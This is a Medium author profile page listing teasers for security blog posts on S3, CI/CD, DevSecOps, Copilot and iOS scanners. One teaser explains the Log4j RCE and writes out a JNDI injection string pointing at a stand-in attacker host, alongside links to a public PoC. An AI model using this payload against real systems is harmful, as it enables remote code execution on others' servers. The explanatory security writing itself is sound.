Open in app

Sign in

Write

Sign in

YevhSec1
YevhSec1

455 Followers

Home

About

Sep 25

Why Storing Plaintext Passwords in a Private S3 Bucket it’s bad idea?

Let’s imagine that you store usernames and passwords in cleartext in the S3 bucket. Let’s assume that access to the entire bucket is configured properly and the “Access Denied” error returned, as shown below. However, with a certain request to Google, we see that the files in the S3 were indexed.

Cybersecurity

1 min read

Why Storing Plaintext Passwords in a Private S3 Bucket it’s bad idea?
Why Storing Plaintext Passwords in a Private S3 Bucket it’s bad idea?
Cybersecurity

1 min read


Jul 27

AWS Account Hijacking via CI/CD

In the evolving landscape of cloud computing, AWS (Amazon Web Services) stands out as a leading service provider. However, as with any digital frontier, it is not without its potential vulnerabilities. One of the emerging threats faced by organizations today is CI/CD Security. In this short blog post I will show how the AWS Account Hijacking can be done via CI/CD. IAM Configuration Workflow

Ci Cd Pipeline

2 min read

AWS Account Hijacking via CI/CD
AWS Account Hijacking via CI/CD
Ci Cd Pipeline

2 min read


Mar 17

GPT-4 Technical Report analysis

Link: https://cdn.openai.com/papers/gpt-4.pdf Changes in short: Context doubled (x8) Keeping training secret “Given both the competitive landscape and the safety implications of large-scale models like GPT-4, this report contains no further details about the architecture (including model size), hardware, training compute, dataset construction, training method, or similar.” 3. Performance improvement (better marks in well-known…

ChatGPT

6 min read

GPT-4 Technical Report analysis
GPT-4 Technical Report analysis
ChatGPT

6 min read


Sep 21, 2022

DevSecOps — integrating SAST, SCA, Secrets detection, Container security and IaC scanning with JIT

Do you still remember when it took a long time to implement Security controls into your workflow? Let’s do it in 5 minutes with JIT.io — a modern DevSecOps Orchestration Platform! Let imagine the following workflow The list of Security Controls that will be added: Detecting secrets tool Static application…

Devsecops

3 min read

DevSecOps — integrating SAST, SCA, Secrets detection, Container security and IaC scanning with JIT.i
DevSecOps — integrating SAST, SCA, Secrets detection, Container security and IaC scanning with JIT.i
Devsecops

3 min read


Aug 24, 2022

Could GitHub Copilot produce a vulnerable code?

GitHub Copilot is an interesting solution that promises to simplify the developer’s day-to-day tasks. This short article aims to answer the question: Could GitHub Copilot produce a vulnerable code? Could GitHub Copilot produce some sensitive information that may be real? …

Cybersecurity

7 min read

Could GitHub Copilot produce a vulnerable code?
Could GitHub Copilot produce a vulnerable code?
Cybersecurity

7 min read


Jul 23, 2022

Google Indexing — how to fix

Search engines doing really great job in indexing content. Of course everyone wants to be at the top of the search results. But sometimes it can lead to security issues. In this short article we will give a few examples and describe how you can fix the indexing problem. Note…

Hacking

2 min read

Google Indexing — how to fix
Google Indexing — how to fix
Hacking

2 min read


Feb 20, 2022

iOS Apps Security scanners practical comparison

In this article, I tried to overview: What iOS Apps Security Scanners exist on the market, What capabilities they provide, and what vulnerabilities they can discover. Given that new solutions and vulnerable applications often appear on the market, this article will be updated further. …

Security

5 min read

iOS Apps Security scanners practical comparison
iOS Apps Security scanners practical comparison
Security

5 min read


Jan 15, 2022

DevSecOps — What Security Controls exist and when to implement them?

In this short article, I tried to overview what Security Controls exists, what stage it can be added to the CI/CD process, and what benefits we receive. In simple words, DevSecOps is about adding different security controls at every step of your CI/CD process. …

Devsecops

4 min read

DevSecOps — What Security Controls exist and when to implement them?
DevSecOps — What Security Controls exist and when to implement them?
Devsecops

4 min read


Dec 22, 2021

Implementing Application Security on your project

The main purpose: CyberSecurity should help businesses succeed. Structure: 1. Main goal of Secure Software Development Life Cycle (SSDLC) 2. Controls that can be implemented on different stages of the Secure Software Development Life Cycle 3. What methods are the most effective in identifying vulnerabilities based on OWASP rating 4. Example of potential implementation…

Appsec

6 min read

Implementing Application Security on your project
Implementing Application Security on your project
Appsec

6 min read


Dec 10, 2021

Log4j 0-day RCE: Top companies affected

How it’s work: We send a specially formed request like $ {jndi: ldap: //attacker.host/blabla} to any place that can potentially be logged. JNDI (Java Naming and Directory Interface), in turn, processes the template, requests data via LDAP from attacker.host In the response, a JAVA class is given, which allows you to execute arbitrary code. PoC: https://github.com/tangxiaofeng7/apache-log4j-poc Log4j2 RCE BurpSuite Plugin: https://github.com/whwlsfb/Log4j2Scan

Rce

1 min read

Log4j 0-day RCE: Top companies affected
Log4j 0-day RCE: Top companies affected
Rce

1 min read

YevhSec1

YevhSec1

455 Followers

MSc in Cyber Security, OSCP, eWPTXv2, CEH Master. Awarded by Apple, Trello, Kraken..

Following
  • Nour Boustani

    Nour Boustani

  • Shashank

    Shashank

  • Kostiantyn Teltov

    Kostiantyn Teltov

  • Bloqarl

    Bloqarl

  • Roman Samoilenko

    Roman Samoilenko

See all (7)

Help

Status

About

Careers

Blog

Privacy

Terms

Text to speech

Teams